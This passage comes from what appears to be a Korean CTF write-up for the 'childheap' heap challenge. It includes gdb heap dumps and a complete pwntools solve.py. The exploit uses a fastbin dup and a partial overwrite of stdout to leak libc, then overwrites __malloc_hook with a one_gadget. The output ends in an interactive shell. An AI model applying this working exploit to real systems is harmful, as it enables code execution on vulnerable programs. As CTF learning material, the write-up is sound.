\u2502\u00b7\u00b7\u00b7^\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7^\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000050 a3 86 17 5e 8b 7f 00 00 a3 86 17 5e 8b 7f 00 00 \u2502\u00b7\u00b7\u00b7^\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7^\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000060 a4 86 17 5e 8b 7f 00 00 00 00 00 00 00 00 00 00 \u2502\u00b7\u00b7\u00b7^\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000080 00 00 00 00 00 00 00 00 e0 78 17 5e 8b 7f 00 00 \u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7x\u00b7^\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000090 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff \u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 000000a0 00 00 00 31 2e 20 6d 61 6c 6c 6f 63 0a 32 2e 20 \u2502\u00b7\u00b7\u00b71\u2502. ma\u2502lloc\u2502\u00b72. \u2502\n 000000b0 66 72 65 65 0a 3e 20 \u2502free\u2502\u00b7> \u2502\n 000000b7\n[*] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x00\\x18\u00ad\u00fb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17^\\x7f\\x00\\x00\u00a3\\x17^\\x7f\\x00\\x00\u00a3\\x17^\\x7f\\x00\\x00\u00a3\\x17^\\x7f\\x00\\x00\u00a4\\x17^\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u00e0x\\x17^\\x7f\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\\x00\\x00\\x001. malloc<\/pre>\n\n\n\n
leak = r()\n info(leak)\n\n leak = leak[0x88:0x88+8]\n leak = uu64(leak)\n info(hex(leak))\n\n l.address = leak - l.sym._IO_2_1_stdin_\n info(hex(l.address))\n\n real_oneshot = l.address + 0xf1247\n real_malloc = l.symbols['__malloc_hook']\n real_free = l.symbols['__free_hook']<\/pre>\n\n\n\n
4. fastbin_dup \ud2b8\ub9ac\uac70\ud574\uc11c __malloc_hook \ub36e\uae30<\/h3>\n\n\n\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x2aa1e1e0 (size : 0x20e20) \n last_remainder: 0x2aa1e0e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x2aa1e0e0\ngdb-peda$ parseheap\naddr prev size status fd bk \n0x2aa1e000 0x0 0x70 Used None None\n0x2aa1e070 0x0 0x70 Used None None\n0x2aa1e0e0 0x0 0x20 Freed 0x7f60d6317b88 0x7f60d6317b88\n0x2aa1e100 0x20 0x70 Used None None\n0x2aa1e170 0x0 0x70 Used None None<\/pre>\n\n\n\n
0x60 \ud06c\uae30\ub85c \ud799\uc744 2\ubc88 \ud560\ub2f9\ud55c\ub2e4.<\/p>\n\n\n\n malloc_2(0, 0x60, b'A'*8)\n malloc(1, 0x60, b'A'*8)<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x36491000 0x0 0x70 Used None None\n0x36491070 0x0 0x70 Used None None\n0x364910e0 0x0 0x20 Freed 0x7fdfa5877b88 0x7fdfa5877b88\n0x36491100 0x20 0x70 Used None None\n0x36491170 0x0 0x70 Used None None\n0x364911e0 0x0 0x70 Used None None\n0x36491250 0x0 0x70 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x364912c0 (size : 0x20d40) \n last_remainder: 0x364910e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x364910e0<\/pre>\n\n\n\n
free(0)\n free(1)\n free(0)<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x59f7000 0x0 0x70 Used None None\n0x59f7070 0x0 0x70 Used None None\n0x59f70e0 0x0 0x20 Freed 0x7fc87d417b88 0x7fc87d417b88\n0x59f7100 0x20 0x70 Used None None\n0x59f7170 0x0 0x70 Used None None\n0x59f71e0 0x0 0x70 Freed 0x59f7250 None\n0x59f7250 0x0 0x70 Freed 0x59f71e0 None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x59f71e0 --> 0x59f7250 --> 0x59f71e0 (overlap chunk with 0x59f71e0(freed) )\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x59f72c0 (size : 0x20d40) \n last_remainder: 0x59f70e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x59f70e0\ngdb-peda$ <\/pre>\n\n\n\n
malloc(0, 0x60, p64(real_malloc-35))<\/pre>\n\n\n\n
\uc774\ub294 malloc_hook \uc8fc\uc18c \uadfc\ubc29\uc784.<\/p>\n\n\n\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x83fe250 --> 0x83fe1e0 --> 0x7f4839f37aed (size error (0x78)) --> 0x4839bf8ea0000000 (invaild memory)\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x83fe2c0 (size : 0x20d40) \n last_remainder: 0x83fe0e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x83fe0e0<\/pre>\n\n\n\n
gdb-peda$ x\/16gx 0x7fb29c267b10-35\n0x7fb29c267aed <_IO_wide_data_0+301>:\t0xb29c266260000000\t0x000000000000007f\n0x7fb29c267afd:\t0xb29bf28ea0000000\t0xb29bf28a7000007f\n0x7fb29c267b0d <__realloc_hook+5>:\t0x000000000000007f\t0x0000000000000000<\/pre>\n\n\n\n
5. \uc258 \uc5bb\uae30<\/h3>\n\n\n\n
malloc_hook\uc744 one_gadget \uc8fc\uc18c\ub85c \ub36e\uc5b4\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n malloc(1, 0x60, b'B'*8)\n malloc(2, 0x60, b'B'*8)\n malloc(3, 0x60, b'C'*19+ p64(real_oneshot))\n\n # Malloc \ud568\uc218\ub97c \uc2e4\ud589\ud574 \uc258\uc744 \ub534\ub2e4.\n p.sendlineafter('>', '1')\n p.sendlineafter(':', '2')\n ip()\n p.sendlineafter(b':', b'\\x63')\n\n pi()<\/pre>\n\n\n\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x14b65250 --> 0x14b651e0 --> 0x7f17df3e7aed (size error (0x78)) --> 0x17df0a8ea0000000 (invaild memory)\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x14b652c0 (size : 0x20d40) \n last_remainder: 0x14b650e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x14b650e<\/pre>\n\n\n\n
solve.py<\/h3>\n\n\n\n
#!\/usr\/bin\/env python3\nimport sys, io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', errors='replace')\nsys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8', errors='replace')\n\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\t\n\ndef malloc(idx, size, content):\n sla('>', '1')\n sla('index: ', str(idx))\n sla('size: ', str(size))\n sa(b'content: ', content)\n\ndef malloc_2(idx, size, content):\n sl('1')\n sla('index: ', str(idx))\n sla('size: ', str(size))\n sa(b'content: ', content)\n\ndef free(idx):\n sla('>', '2')\n sla('index: ', str(idx)) \n\nwhile True:\n p = process(\".\/childheap\")\n # p = remote(\"challenge.nahamcon.com\", 31899)\n e = ELF('.\/childheap',checksec=False)\n l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n # l = ELF('.\/libc.so.6', checksec=False)\n\n s = lambda str: p.send(str)\n sl = lambda str: p.sendline(str)\n sa = lambda delims, str: p.sendafter(delims, str)\n sla = lambda delims, str: p.sendlineafter(delims, str)\n r = lambda numb=4096: p.recv(numb)\n rl = lambda: p.recvline()\n ru = lambda delims: p.recvuntil(delims)\n uu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\n uu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\n li = lambda str, data: log.success(str + \"========>\" + hex(data))\n ip = lambda: input()\n pi = lambda: p.interactive()\n\n # \ucd94\ud6c4 unsorted bin \ubcd1\ud569\uc744 \ub9c9\uae30 \uc704\ud574 fastbin \ud06c\uae30\uc758 heap\uc744 \uba3c\uc800 \uc0dd\uc131\ud55c\ub2e4. \n malloc(0, 0x60, b'A'*8)\n\n # unsorted bin \ud06c\uae30\uc778 0x80 \ud06c\uae30\uc758 heap \uc0dd\uc131.\n malloc(1, 0x80, b'B'*8)\n\n # \ubcd1\ud569\uc744 \ub9c9\uae30 \uc704\ud574 \ud55c\ubc88\ub354 fastbin 0x60 \ud06c\uae30\uc758 heap\uc744 \uc0dd\uc131\ud55c\ub2e4.\n malloc(2, 0x60, b'A'*8)\n\n # 4. heap1\uc744 \ud574\uc81c\ud574 unsorted bin\uc744 \ub9cc\ub4e4\uba74 \n # FD, BK\uc5d0 main_arena+88 \uc8fc\uc18c\uac00 \uc801\ud600 \uc788\uc744 \uac83\uc774\ub2e4.\n\n # gdb-peda$ parseheap\n # addr prev size status fd bk \n # 0x760f000 0x0 0x70 Used None None\n # 0x760f070 0x0 0x90 Freed 0x7f943dea9b78 0x7f943dea9b78\n # 0x760f100 0x90 0x70 Used None None\n # gdb-peda$ x\/32gx 0x760f070\n # 0x760f070:\t0x0000000000000000\t0x0000000000000091\n # 0x760f080:\t0x00007f943dea9b78\t0x00007f943dea9b78\n\n # gdb-peda$ heapinfo\n # (0x20) fastbin[0]: 0x0\n # (0x30) fastbin[1]: 0x0\n # (0x40) fastbin[2]: 0x0\n # (0x50) fastbin[3]: 0x0\n # (0x60) fastbin[4]: 0x0\n # (0x70) fastbin[5]: 0x0\n # (0x80) fastbin[6]: 0x0\n # (0x90) fastbin[7]: 0x0\n # (0xa0) fastbin[8]: 0x0\n # (0xb0) fastbin[9]: 0x0\n # top: 0x760f170 (size : 0x20e90) \n # last_remainder: 0x0 (size : 0x0) \n # unsortbin: 0x760f070 (size : 0x90)\n \n\n # 5. main_arena\uc640 stdout\uc758 offset \ucc28\uc774\uac00 \uc5bc\ub9c8 \ub098\uc9c0 \uc54a\ub294\ub2e4. \n # gdb-peda$ p stdout\n # $5 = (struct _IO_FILE *) 0x7f39b9fc8620 <_IO_2_1_stdout_>\n\n # gdb-peda$ x\/16gx 0x7f39b9fc8620-0x43\n # 0x7f39b9fc85dd <_IO_2_1_stderr_+157>:\t0x39b9fc7660000000\t0x000000000000007f\n # 0x7f39b9fc85ed <_IO_2_1_stderr_+173>:\t0x0000000000000000\t0x0000000000000000\n # 0x7f39b9fc85fd <_IO_2_1_stderr_+189>:\t0x0000000000000000\t0x0000000000000000\n # 0x7f39b9fc860d <_IO_2_1_stderr_+205>:\t0x0000000000000000\t0x39b9fc66e0000000\n # 0x7f39b9fc861d <_IO_2_1_stderr_+221>:\t0x00fbad288700007f\t0x39b9fc86a3000000\n # 0x7f39b9fc862d <_IO_2_1_stdout_+13>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n # 0x7f39b9fc863d <_IO_2_1_stdout_+29>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n # 0x7f39b9fc864d <_IO_2_1_stdout_+45>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n\n # gdb-peda$ info address _IO_2_1_stderr_\n # Symbol \"_IO_2_1_stderr_\" is static storage at address 0x7f39b9fc8540.\n\n # gdb-peda$ p\/x 0x7f39b9fc8540+157\n # $6 = 0x7f39b9fc85dd\n \n # gdb-peda$ x\/16gx 0x7f39b9fc8620-0x43\n # 0x7f39b9fc85dd <_IO_2_1_stderr_+157>:\t0x39b9fc7660000000\t0x000000000000007f\n # 0x7f39b9fc85ed <_IO_2_1_stderr_+173>:\t0x0000000000000000\t0x0000000000000000\n # 0x7f39b9fc85fd <_IO_2_1_stderr_+189>:\t0x0000000000000000\t0x0000000000000000\n # 0x7f39b9fc860d <_IO_2_1_stderr_+205>:\t0x0000000000000000\t0x39b9fc66e0000000\n # 0x7f39b9fc861d <_IO_2_1_stderr_+221>:\t0x00fbad288700007f\t0x39b9fc86a3000000\n # 0x7f39b9fc862d <_IO_2_1_stdout_+13>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n # 0x7f39b9fc863d <_IO_2_1_stdout_+29>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n # 0x7f39b9fc864d <_IO_2_1_stdout_+45>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n \n # gdb-peda$ p *(struct _IO_FILE_plus *)0x7f39b9fc8540 \n # $9 = {\n # file = {\n # _flags = 0xfbad2086, \n # _IO_read_ptr = 0x0, \n # _IO_read_end = 0x0, \n # _IO_read_base = 0x0, \n # _IO_write_base = 0x0, \n # _IO_write_ptr = 0x0, \n # _IO_write_end = 0x0, \n # _IO_buf_base = 0x0, \n # _IO_buf_end = 0x0, \n # _IO_save_base = 0x0, \n # _IO_backup_base = 0x0, \n # _IO_save_end = 0x0, \n # _markers = 0x0, \n # _chain = 0x7f39b9fc8620 <_IO_2_1_stdout_>, \n # _fileno = 0x2, \n # _flags2 = 0x0, \n # _old_offset = 0xffffffffffffffff, \n # _cur_column = 0x0, \n # _vtable_offset = 0x0, \n # _shortbuf = \"\", \n # _lock = 0x7f39b9fc9770 <_IO_stdfile_2_lock>, \n # _offset = 0xffffffffffffffff, \n # _codecvt = 0x0, \n # _wide_data = 0x7f39b9fc7660 <_IO_wide_data_2>, \n # _freeres_list = 0x0, \n # _freeres_buf = 0x0, \n # __pad5 = 0x0, \n # _mode = 0x0, \n # _unused2 = '\\000' <repeats 19 times>\n # }, \n # vtable = 0x7f39b9fc66e0 <_IO_file_jumps>\n # }\n\n\n # fastbin \ud06c\uae30\uc758 heap\uc744 \ud558\ub098 \uc0dd\uc131\ud558\uc5ec \n free(1)\n\n # \ub4a4\uc5d0 2byte\ub97c stdout\uc744 overwrite \ud558\uae30 \uc704\ud574 \n # fake chunk\uc758 \uc8fc\uc18c\ub97c \uad6c\ud574 \ub123\uc5b4\uc900\ub2e4. \n # \uc55e\uc5d0 0.5byte\ub294 1\/16\uc758 \ud655\ub960\ub85c Brute-Force \ud558\uba74 \ub098\uc628\ub2e4.\n\n # ip()\n malloc(1, 0x60, p16(0x85dd)) #0x7f39b9fc85dd <_IO_2_1_stderr_+157>\n # ip()\n\n # 6. fastbin dup\uc744 \ubc1c\uc0dd\uc2dc\ud0a8\ub2e4. \n # heap\uc744 \ud560\ub2f9\ud558\uace0 \n # ip()\n malloc(3, 0x60, b'C'*8)\n\n # fastbin dup \ud2b8\ub9ac\uac70\n free(3)\n free(0)\n free(3)\n \n # \ub4a4\uc5d0 1byte\ub97c 0x70\uc73c\ub85c \ubc14\uafd4 \n # stdout fake chunk\uc5d0 \uac12\uc744 \uc801\uc5b4\uc904 \uac83\uc774\ub2e4\n malloc(0, 0x60, p8(0x70))\n\n\n malloc(1, 0x60, b'D'*8)\n malloc(2, 0x60, b'D'*8)\n malloc(3, 0x60, b'D'*8)\n\n # 7. stdout\uc744 \ub36e\uc5c8\ub2e4\uba74, \n payload = b'A'*51 + p64(0xfbad1800) + p64(0)*3 + p8(0)\n\n try:\n malloc(4, 0x60, payload)\n # pause()\n except:\n p.close()\n continue\n\n # leak\ub41c stdin\ub4f1\uc744 \uac00\uc838\uc640 \n # libc base address\ub97c \uad6c\ud574 oneshot gadget\uacfc __malloc_hook\uc744 \uad6c\ud574\uc900\ub2e4.\n\n leak = r()\n info(leak)\n\n leak = leak[0x88:0x88+8]\n leak = uu64(leak)\n info(hex(leak))\n\n l.address = leak - l.sym._IO_2_1_stdin_\n info(hex(l.address))\n\n real_oneshot = l.address + 0xf1247\n real_malloc = l.symbols['__malloc_hook']\n real_free = l.symbols['__free_hook']\n\n # fastbin dup\uc744 \ubc1c\uc0dd\uc2dc\ucf1c __malloc_hook\uc744 \ub36e\ub294\ub2e4. \n # \ub2e8, \uc5ec\uae30\uc11c\ub3c4 __malloc_hook\uc5d0 fake chunk\ub97c \uc801\uc6a9\uc2dc\ucf1c \ub36e\uc5b4\uc57c\uc9c0.. \n # \uc544\ub2c8\uba74 memory corruption \uc624\ub958\uac00 \ub2f9\uc5f0\ud788 \ubc1c\uc0dd\ud558\uac8c \ub41c\ub2e4.\n\n # ip()\n \n malloc_2(0, 0x60, b'A'*8)\n malloc(1, 0x60, b'A'*8)\n # ip()\n\n free(0)\n free(1)\n free(0)\n # ip()\n\n malloc(0, 0x60, p64(real_malloc-35))\n # ip()\n malloc(1, 0x60, b'B'*8)\n malloc(2, 0x60, b'B'*8)\n malloc(3, 0x60, b'C'*19+ p64(real_oneshot))\n\n # Malloc \ud568\uc218\ub97c \uc2e4\ud589\ud574 \uc258\uc744 \ub534\ub2e4.\n sla('>', '1')\n sla(':', '2')\n # ip()\n sla(b':', b'\\x00')\n\n pi()<\/pre>\n\n\n\nResult<\/h3>\n\n\n\n
...\n[*] Process '.\/childheap' stopped with exit code -11 (SIGSEGV) (pid 9013)\n[+] Starting local process '.\/childheap': pid 9015\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 157)\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 157)\n[*] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x00\\x18\u00ad\u00fb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00k\\x7f\\x00\\x00\u00a3k\\x7f\\x00\\x00\u00a3k\\x7f\\x00\\x00\u00a3k\\x7f\\x00\\x00\u00a4k\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u00e0xk\\x7f\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\\x00\\x00\\x001. malloc\n 2. free\n > \n[*] 0x7f8b6b8678e0\n[*] 0x7f8b6b4a3000\n[*] Switching to interactive mode\n $ id\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$ whoami\nubuntu\n$ uname -a\nLinux 7a6827c0e1bf 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 x86_64 x86_64 GNU\/Linux\n$ \n[*] Interrupted<\/pre>\n","protected":false},"excerpt":{"rendered":"